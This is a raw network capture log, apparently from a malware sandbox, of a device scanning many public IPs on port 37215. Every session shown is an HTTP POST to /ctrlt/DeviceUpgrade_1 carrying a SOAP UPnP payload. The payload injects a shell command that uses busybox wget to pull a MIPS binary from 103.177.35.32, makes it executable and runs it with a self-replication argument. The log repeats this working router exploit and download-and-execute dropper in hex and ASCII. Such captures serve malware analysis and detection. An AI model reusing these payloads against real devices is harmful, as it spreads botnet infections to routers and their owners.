                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2362192.168.2.2339298165.188.227.20537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.592925072 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2363192.168.2.2338478175.165.50.6137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.592943907 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2364192.168.2.235235041.10.169.8637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.592951059 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2365192.168.2.234730641.239.198.237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.593090057 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2366192.168.2.2355310157.181.125.21537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.593102932 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2367192.168.2.2346398197.24.170.21037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.593859911 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2368192.168.2.235418241.69.210.5037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.593945980 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2369192.168.2.2350812157.141.159.7837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.593965054 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2370192.168.2.2334714197.63.74.10137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.594012022 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2371192.168.2.2334848157.247.246.16037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.594367981 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
